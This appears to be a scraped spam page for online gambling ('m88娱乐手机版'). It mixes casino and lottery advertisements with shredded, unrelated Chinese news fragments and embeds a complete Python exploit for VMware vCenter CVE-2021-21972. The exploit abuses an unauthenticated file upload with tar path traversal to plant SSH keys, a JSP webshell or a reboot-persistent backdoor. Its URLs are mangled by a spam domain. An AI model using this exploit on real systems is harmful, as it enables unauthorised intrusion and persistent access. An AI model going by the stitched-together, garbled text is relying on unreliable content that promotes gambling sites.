m88娱乐手机版-321awaycampervans.com

google seo -> telegram: @ehseo6

">Newsnet 2023-01-28 11:00
  • home  >   /萌娃各显神通,竞选大队委啦   >   m88娱乐手机版
  • 永恒平台招商部 熊猫分发下载
    优发手机登录不上 米兰娱乐场信誉好不好
    下载云顶国际平台 how about m88娱乐手机版?
    What's the m88娱乐手机版 phone number? What is m88娱乐手机版 contact information ?
    Online consultation m88娱乐手机版 The picture of the m88娱乐手机版
    m88娱乐手机版of the video Is m88娱乐手机版 for real ?
    m88娱乐手机版's website A map of m88娱乐手机版
    m88娱乐手机版 of tiktok m88娱乐手机版music
    m88娱乐手机版 of news m88娱乐手机版app
    m88娱乐手机版company Customer service of m88娱乐手机版 company

    彩神网论坛网址多少『8TBH·COM』盛兴彩票sx97.com-   K.H3T4B6 铮  I   G 铮 铮 Z

    曾强提议的金三极战略,将力求助推雄安引领中国占领全球产业和金融制高点,走向世界强国之路。   A凤凰网WEMONEY讯在过去的一年多中,要求网贷去刚兑的声音渐起,以风险备付金为代表的保障方式逐步被压缩取消,于是网贷平台开始和保险公司寻找一种更说得过去的保障方式。  铮 Q

    我们更关注的不是某个技术本身,而是这些应用怎么去落地,不管是人工智能、区块链、VR、AR也好,这些新技术最终是不是能够落地,是不是真正满足了市场的需求、解决了市场的痛点。 澳门百老汇手机网页jdb168客服电话『8TBH·COM』五张牌娱乐-   U.H3T4B6   I   L   B   K与SUV产品销量下滑内忧相比,江淮汽车面临的外部环境也更加复杂多变。   E

    比如,加大在巴西头号大豆产区的收购量。  铮 M今年2月,商务部对原产于美国的进口高粱进行反倾销和反补贴立案调查。  ? M

    抓住机遇聚力打造新能源汽车产业集群产业是经济增长的动力之源,更是产业新城的立根之本。   U针对最近几个月来腾讯系(腾讯、京东)大手笔入股永辉、家乐福、海澜之家和步步高,与零售企业展开合作这个问题,马化腾称有很多人问他背后的原因,大家都表示看不懂。   Q

    新赛季开局又是顺风顺水,来到这个阶段出现一些下滑也是可以理解的。   T

    美国对主要盟国的钢铝关税突然取消,欧盟、加拿大、墨西哥、韩国、巴西和澳大利亚等都得到豁免;对中国的新关税可能会在磋商期得到类似的豁免。   P

    这样一个现象级产品,无疑也引来监管的关注。   Q业内人士认为,京东金融此次发布北斗七星,意味着其B2B2C商业模式的落地不仅能够为银行提供数字化服务,帮助银行实现人、货、场的贯通,而且能够为银行带来场景和客户,特别是银行想要接触到的大量移动互联网时代下成长起来的95后、00后。  ? G大红鹰网上代理bbin推荐平台『8TBH·COM』明珠会员入口-   B.H3T4B6 铮  Y   A  铮 V

    曾强认为,历史证明,颠覆性技术的发明及广泛应用,往往能够主导一个城市甚至一个大国的兴衰,深圳应抓住当前重要历史机遇,积极践行金三极战略,同时构建会思考的城市智能生态场,以环保式服务营造独角兽群居栖息地,助力粤港澳大湾区引领中国占据全球产业与金融制高点。   X

    国家相关资金入市只是为了维护市场稳定,并非为了推高股价。   F下一步我们将密切关注301调查有关进展,一旦美国有关措施实施,中国会坚决出手。 铮  U

    「国货当自强」,中国消费者迫切的希望国产品牌的崛起,国人对李宁这个品牌有着岁月的情节和很高的期待,而有了文化和历史底蕴的品牌才能是一个好的载体,设计师也能更好地发散思维。  铮 C

    在曼城执教167场,佩莱格里尼率队取得100胜28平29负,胜率达到%,成绩非常出色。   U

    对于用户,美团打车也将推出打车送外卖券等活动,即将上线的北京站还主打1分钱体验。   F在财通证券分析师看来,自主SUV细分市场价格战激烈,江淮汽车主力车型瑞风S3受宝骏、长安的低价SUV冲击销量不佳,重点产品瑞风S7上市后推广宣传未能及时跟进,导致产品曝光率低,销量爬坡迟缓。918博天堂游戏中心杏彩信誉良好『8TBH·COM』v8娱乐平台注册28-   K.H3T4B6   G   G   U   A

    从印第安维尔斯半决赛面对丘里奇开始,费德勒连续三场比赛打满三盘且遭遇两连败,两场失利还都是以决胜盘抢七的方式输掉的。   ZDropbox公司将在纳斯达克交易所上市,股票代码为DBX。   O

    2017年12月底,美团APP在全国七个城市接入打车推广链接,包括北京、上海、成都、杭州、温州、福州和厦门。   Z第71分钟,克里斯坦特上场替下维拉蒂。   N

    北京银行、江苏银行、南京银行、包商银行、大连银行等近30家中小银行参会。   Y据投资者透露,去年12月底,财大狮就开始逾期了。  铮 Y

    女士们、先生们,各位来宾,非常高兴来到中国发展高层论坛,和大家一起分享供给侧结构性改革过程中的金融政策。   O有些平台常常会对这些具体的规定三缄其口,模糊其词,但这些细节最终会影响投资人能拿回赔偿款的额度。  R

    只要他们用的好。 铮  H ag环亚视迅厅稳赢技巧太阳娱乐登录首页『8TBH·COM』易胜博优惠活动-   U.H3T4B6   R   O   F

    北京时间3月22日,CBA季后赛首轮第四场继续进行。   E

    合资合作未达预期2017年报数据显示,与SUV下降较多不同的是,江淮汽车商用车、MPV和新能源板块销量均实现了不同幅度的增长。 铮  Q原标题:王兴:美团打车已经在进驻城市拿下1/3市场份额猎云注:目前根据美团点评CEO王兴透露,美团打车业务已经在所进入的城市拿到1/3的市场份额。   P

    余额宝申购额度已过此前宣布的限购期一周时间却仍未放开。   Q

    一旦遇到投诉,消费者就容易掉进商家设计的陷阱,哑巴吃黄连有苦难言。   I北京时间3月24日凌晨03:45,一场国际足球友谊赛在伊蒂哈德球场展开,由阿根廷对阵意大利。   R

    对于公司经营情况,江淮汽车总经理项兴初表示,2017年在发展中遇到的困难,是转型升级中的阵痛,是调整过程中的必经之路,存在的问题主要是采用的技术手段、管理手段和消费者的核心诉求存在错位,缺乏对消费者的深度研究和需求配置的排序。   F

    此外,美国财政部将在60天内出台方案,限制中国企业投资并购美国企业。   Q

    丁健从不会为了所谓的追风口而感到焦虑,在他看来,投资本来就不应该是一个追风口的游戏,需要很慎重得去了解,今天我觉得每一个制造的风口,大概周边都会有十个陷阱等着。   C9亿娱乐平台注册新人注册送29『8TBH·COM』求个正规的网投平台-   B.H3T4B6 铮  N   U   J玖富牵手人保、太平两大险企上线履约险3月19日,玖富普惠发布保障计划升级公告称,继与太平财险合作为平台用户提供一年期以内借款履约保证保险保障之后,中国人保财险也加入玖富平台的履约保证保险保障计划。  铮 D

    合胜娱乐场最新网址『8TBH·COM』秒博娱乐场app版-   R.H3T4B6   I  铮 G   E

    余额宝申购额度已过此前宣布的限购期一周时间却仍未放开。   Z2.商务部:一旦美国有关措施实施,中国会坚决出手北京时间周五,商务部条法司司长陈福利表示,中国不希望发生贸易战,也不会主动挑起贸易战,但不我们不惧怕贸易战,也不会躲避贸易战。   S

    余额宝申购额度已过此前宣布的限购期一周时间却仍未放开。   O对于投资人来讲,前者的重点就更多一点。   K

    而对于后续的确认购买信息也并没有出现在媒体报道栏目列表里。   Wm.599.lom英飞娱乐注册送8-88『8TBH·COM』cc娱乐游戏客户端-  ? P.H3T4B6   S   G 铮  M劳动力市场尚未过热,劳动力成本有上行风险。 铮  X

    在期待与鼓励中,第七届华夏之星菁英训练营正式开营,第四座初心图书馆正式动工。   V第30分钟,鲁本-内维斯一脚远射打高。   J

    但是特朗普表示这是出于对国家安全的考量,不会再签署类似这样的议案。   H

    第64分钟,阿根廷做出人员调整,迪玛利亚和帕雷德斯分别被佩罗蒂与巴内加换下。   D

    李宁设计师手稿另一方面,国人都是希望中国品牌可以走上国际舞台,讲述中国的故事的,而肩负着这项使命的李宁理应就得到了消费者的认可。   U综合服务就是美团点评最大的优势。  X

    阿里一直在谈的新零售,其中五新(阿里巴巴提出的五新战略新零售、新制造、新金融、新技术和新能源)的新制造,郭台铭直言是他给马云加上去的。   X

    王兴在会上透露,美团点评两年前就已着手无人车配送技术的开发,目前已申请超过60项专利技术。   N美方肆意挥舞贸易保护主义大棒,国际舆论为之侧目。? ? H

    随后,他宣布,将依据美国贸易代表莱特希泽自去年开展的301调查对自中国进口的商品加收关税。   P

    对于现场检查机构的业务模式、产品模式、风险控制、信息披露等问题,律师事务所应询问机构董监高相关情况。 铮  M

    方案强调,网贷机构原则上应于2018年4月25日前向注册地所在区金融工作部门提交验收申请及材料。   A他也表示目前外界没有一个分析师或者评论员把背后的战略布局讲得太到位。   Z

    随后,他宣布,将依据美国贸易代表莱特希泽自去年开展的301调查对自中国进口的商品加收关税。uu娱乐轻松致富加盟太阳城官方网77nsc『8TBH·COM』亿博彩票1分彩计划-  F.H3T4B6   H   J   S   W凤凰网科技:阿里、腾讯的投资部门频繁出手,会不会对机构投资者有一定的影响?丁健:我们不担心,我们其实还和他们有非常深的合作。 铮  T

    新能源业务面临不确定性安信证券分析师衡昆表示,公司乘用车产品竞争力不足,在未来乘用车市场分化加剧的大背景下,公司的主要看点将在传统强项商用车、MPV以及新兴业务新能源汽车上。  K而对于后续具体解决办法,财大狮官网上尚未有任何相关的公告。 铮 铮 D

    高盛收跌%,本周累跌%;美国银行收跌%,本周累跌%;花旗集团收跌%,本周累跌%;摩根大通收跌%,本周累跌%;摩根士丹利收跌%,本周累跌%。   J曾强认为,粤港澳大湾区坐拥多个产业龙头企业,且拥有完善的金融服务,完全具备形成独角兽发现-培育-上市-成为独角兽发现及培育者的闭环;以及以各类金融服务机构为依托,以交易所为重要退出渠道的资金天使-VC/PE-Pre_IPO-IPO获利退出的资金投资回报闭环。 ?  D

    凤凰网科技讯3月25日消息,IT领袖峰会今天在深圳正式开幕。  铮 T不过,西汉姆本赛季成绩糟糕,进而换帅,邀请来曾在曼联执教的莫耶斯。   G

    威尔士首发:门将:1-亨内西/后卫:2-冈特、5-切斯特、6-阿什利-威廉姆斯、4-本-戴维斯/中场:8-安迪-金、7-乔-阿伦、14-迪克兰-约翰/前锋:16-哈里-威尔逊、9-沃克斯、11-贝尔(渐修)有被bodog黑过钱吗香港galaxy赌场『8TBH·COM』天祺·国际-   M.H3T4B6   A   E   O   Y

    2018年初美股动荡给了投资者更多的理由,去减少那些大型科技股权重较高的投资组合。   H

    安踏和李宁的竞争一直都是异常激烈(27日,安踏宣布营收达到亿人民币),在国际市场上自然也是不会落下。半岛娱乐场优惠活动esball诚信官网『8TBH·COM』必威体育20万提不出来怎么办-   Z.H3T4B6   X   L   Y   G而对于后续的确认购买信息也并没有出现在媒体报道栏目列表里。   R

    半场比赛结束,国足以0-4大比分落后。  铮 G

    萨林杰和莱斯三分命中,深圳追到63比80。 ? 铮 N其中,苏国才为千和担保公司老板。   Q

    程序员出身的马化腾在早年写了很多程序,看到如今的小程序已经成为现在很受编程者欢迎的编程环境。   H

    产业金三极是指通过颠覆性技术、高端产业、世界标准这三大产业链的制高点,来落实推广高科技在中国的落地生根开花、扩大市场占有率、占据市场要素高地,成为世界产业领域的龙头标杆,掌握产业话语权。稳赢至尊娱乐首存优惠博狗娱乐网址多少『8TBH·COM』大丰平台网址 df008.net-   P.H3T4B6   R   Y   M   G

    关于国足0-6惨败威尔士的比赛中,出现部分球员态度不端正的情况,也是最近几天中国杯的新闻焦点。   X我们在推进金融改革开放上,取得了明显的成效。   D

    鹿鼎在线注册佰德利代理后台网址『8TBH·COM』夜色娱乐场手机版-  K.H3T4B6   Q   F   E

    1.75的赔率才算流水『8TBH·COM』bg真人娱乐-   G.H3T4B6   E   N  铮 P

  • 9- 8- 7- 6- 5- 4- 3- 2- 1

    大众娱乐网址多少『8TBH·COM』君悦娱乐场官方下载-   W.H3T4B6  ? Y 铮  I   X



    EKU-ID: 8293 CVE: 2021-21972 OSVDB-ID:
    Author: Photubias Published: 2023-01-28 Verified:
    Download:

    Rating

    ☆☆☆☆☆
    Home

  • # Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload
    # Date: 2023-01-28
    # Exploit Author: Photubias
    # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html
    # Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)
    # Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds
    # CVE: CVE-2021-21972
    
    #!/usr/bin/env python3
    '''
        Copyright 2021 Photubias(c)        
        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.
        
        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.
        
        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org.321awaycampervans.com/licenses/>.
        
        File name CVE-2021-21972.py
        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
    
        CVE-2021-21972 is an unauthenticated file upload and overwrite,
         exploitation can be done via SSH public key upload or a webshell
         The webshell must be of type JSP, and its success depends heavily on the specific vCenter version
        
        # Manual verification:  https://<ip>/ui/vropspluginui/rest/services/checkmobregister
        #  A white page means vulnerable
        #  A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)
        # Notes:
        #  * On Linux SSH key upload is always best, when SSH access is possible & enabled
        #  * On Linux the upload is done as user vsphere-ui:users
        #  * On Windows the upload is done as system user
        #  * vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui"
        #  * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload
        
        This is a native implementation without requirements, written in Python 3.
        Works equally well on Windows as Linux (as MacOS, probably ;-)
        
        Features: vulnerability checker + exploit
    '''
    
    import os, tarfile, sys, optparse, requests
    requests.packages.urllib3.disable_warnings()
    
    lProxy = {}
    SM_TEMPLATE = b'''<env:Envelope xmlns:xsd="http://www.w3.org.321awaycampervans.com/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org.321awaycampervans.com/soap/envelope/" xmlns:xsi="http://www.w3.org.321awaycampervans.com/2001/XMLSchema-instance">
          <env:Body>
          <RetrieveServiceContent xmlns="urn:vim25">
            <_this type="ServiceInstance">ServiceInstance</_this>
          </RetrieveServiceContent>
          </env:Body>
          </env:Envelope>'''
    sURL = sFile = sRpath = sType = None
    
    def parseArguments(options):
        global sURL, sFile, sType, sRpath, lProxy
        if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')
        sURL = options.url
        if sURL[-1:] == '/': sURL = sURL[:-1]
        if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL
        sFile = options.file
        if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)
        sType = 'ssh'
        if options.type: sType = options.type
        if options.rpath: sRpath = options.rpath
        else: sRpath = None
        if options.proxy: lProxy = {'https': options.proxy}
    
    def getVersion(sURL):
        def getValue(sResponse, sTag = 'vendor'):
            try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]
            except: pass
            return ''
        oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)
        #print(oResponse.text)
        if oResponse.status_code == 200:
            sResult = oResponse.text
            if not 'VMware' in getValue(sResult, 'vendor'):
                exit('[-] Not a VMware system: ' + sURL)
            else:
                sName = getValue(sResult, 'name')
                sVersion = getValue(sResult, 'version') # e.g. 7.0.0
                sBuild = getValue(sResult, 'build') # e.g. 15934073
                sFull = getValue(sResult, 'fullName')
                print('[+] Identified: ' + sFull)
                return sVersion, sBuild
        exit('[-] Not a VMware system: ' + sURL)
    
    def verify(sURL):
        #return True
        sURL += '/ui/vropspluginui/rest/services/uploadova'
        try:
            oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)
        except:
            exit('[-] System not available: ' + sURL)
        if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely
        else: return False
    
    def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):
        def getResourcePath():
            oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)
            return oResponse.text.split('static/')[1].split('/')[0]
        oTar = tarfile.open('payloadLin.tar','w')
        if sRpath: ## version & build not important
            if sRpath[0] == '/': sRpath = sRpath[1:]
            sPayloadPath = '../../' + sRpath
            oTar.add(sFile, arcname=sPayloadPath)
            oTar.close()
            return 'absolute'
        elif sType.lower() == 'ssh': ## version & build not important
            sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'
            oTar.add(sFile, arcname=sPayloadPath)
            oTar.close()
            return 'ssh'
        elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):
            ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber
            sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)
            print('[!] Selected uploadpath: ' + sPayloadPath[5:])
            for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)
            oTar.close()
            return 'webshell'
        elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):
            ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>
            sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)
            print('[!] Selected uploadpath: ' + sPayloadPath[5:])
            oTar.add(sFile, arcname=sPayloadPath)
            oTar.close()
            return 'backdoor'
        else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):
            ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)
            sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)
            print('[!] Selected uploadpath: ' + sPayloadPath[5:])
            oTar.add(sFile, arcname=sPayloadPath)
            oTar.close()
            return 'backdoor'
        
    
    def createTarWin(sFile, sRpath = None):
        ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows
        if sRpath:
            if sRpath[0] == '/': sRpath = sRpath[:1]
            sPayloadPath = '../../' + sRpath
        else:
            sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)
        oTar = tarfile.open('payloadWin.tar','w')
        oTar.add(sFile, arcname=sPayloadPath)
        oTar.close()
    
    def uploadFile(sURL, sUploadType, sFile):
        #print('[!] Uploading ' + sFile)
        sFile = os.path.basename(sFile)
        sUploadURL = sURL +  '/ui/vropspluginui/rest/services/uploadova'
        arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}
        ## Linux
        oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)
        if oResponse.status_code == 200:
            if oResponse.text == 'SUCCESS':
                print('[+] Linux payload uploaded succesfully.')
                if sUploadType == 'ssh':
                    print('[+] SSH key installed for user \'vsphere-ui\'.')
                    print('     Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'')
                    return True
                elif sUploadType == 'webshell':
                    sWebshell = sURL + '/ui/resources/' + sFile
                    #print('testing ' + sWebshell)
                    oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)
                    if oResponse.status_code != 404:
                        print('[+] Webshell verified, please visit: ' + sWebshell)
                        return True
                elif sUploadType == 'backdoor':
                    sWebshell = sURL + '/ui/resources/' + sFile
                    print('[+] Backdoor ready, please reboot or wait for a reboot')
                    print('     then open: ' + sWebshell)
                else: ## absolute
                    pass
        ## Windows
        arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}
        oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)
        if oResponse.status_code == 200:
            if oResponse.text == 'SUCCESS':
                print('[+] Windows payload uploaded succesfully.')
                if sUploadType == 'backdoor':
                    print('[+] Absolute upload looks OK')
                    return True
                else:
                    sWebshell = sURL + '/statsreport/' + sFile
                    oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)
                    if oResponse.status_code != 404:
                        print('[+] Webshell verified, please visit: ' + sWebshell)
                        return True
        return False
    
    if __name__ == "__main__":
        usage = (
            'Usage: %prog [option]\n'
            'Exploiting Windows & Linux vCenter Server\n'
            'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n'
            'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\n'
            'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')
    
        parser = optparse.OptionParser(usage=usage)
        parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')
        parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')
        parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')
        parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')
        parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1.321awaycampervans.com:8080')
        
        (options, args) = parser.parse_args()
           
        parseArguments(options)
           
        ## Verify
        if verify(sURL): print('[+] Target vulnerable: ' + sURL)
        else: exit('[-] Target not vulnerable: ' + sURL)
        
        ## Read out the version
        sVersion, sBuild = getVersion(sURL)
        if sRpath: print('[!] Ready to upload your file to ' + sRpath)
        elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \'' + sFile + '\'')
        else: print('[!] Ready to upload webshell \'' + sFile + '\'')
        sAns = input('[?] Want to exploit? [y/N]: ')
        if not sAns or not sAns[0].lower() == 'y': exit()
        
        ## Create TAR file
        sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)
        if not sUploadType == 'ssh': createTarWin(sFile, sRpath)
    
        ## Upload and verify
        uploadFile(sURL, sUploadType, sFile)
        
        ## Cleanup
        os.remove('payloadLin.tar')
        os.remove('payloadWin.tar')
               








    排列三缩水过滤工具 好用 体彩排列三试机号码多少钱 福彩3d和尾跨度图表 体彩排列三胆码预测最准的方法 第14122期双色球分析预测
    比较大的手机彩票平台 中国福彩双色球软件下载安装 双色球第011期历史同期号码 双色球红红蓝蓝17147 小竞竞足彩分析
    排列三二码和值尾号 贵州福利彩票快三78 我有一组双色球号码预测 陕西中国福彩时时彩官网平台 快三怎么能挣到钱
    大乐透单注预测号码 玩彩票靠谱的平台 重庆时时彩分析软件苹果版 彩吧体彩排列三试机号今天查询 排列三论坛17500